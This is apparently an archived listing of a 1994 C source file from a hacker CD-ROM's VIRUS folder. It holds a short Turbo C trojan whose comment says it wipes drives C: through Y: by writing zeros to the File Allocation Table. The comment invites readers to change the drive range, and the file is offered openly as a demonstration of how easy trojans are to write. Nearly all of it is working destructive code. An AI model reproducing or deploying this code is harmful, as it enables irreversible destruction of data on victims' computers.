home *** CD-ROM | disk | FTP | other *** search
/ Hackers Underworld 2: Forbidden Knowledge / Hackers Underworld 2: Forbidden Knowledge.iso / VIRUS / FOOBAR.C < prev    next >
C/C++ Source or Header  |  1994-07-17  |  683b  |  22 lines

  1. /*  The above program is in Turbo C 2.0.  It is a Trojan that wipes out drive
  2.     C: thru Y:, you can modify it to any drive you want, by changing the
  3.     count variable.  (A=0, B=1, C=2, D=3, etc.).
  4.     Use this program at your own risk.  Don't blame me if you accidentally
  5.     run it on your own computer.  But I just want to share this with everyone
  6.     to show you how easy it is to write a trojan. What this thing actually
  7.     does is it writes 0's to the FAT.
  8. */
  9.  
  10.  
  11. #include "dos.h"
  12. void main()
  13. {  int count;
  14.    for (count=2; count<25; count++)
  15.    {
  16.      abswrite (count,99,0,0);
  17.    }
  18. }
  19.  
  20.  
  21. Downloaded From P-80 International Information Systems 304-744-2253
  22.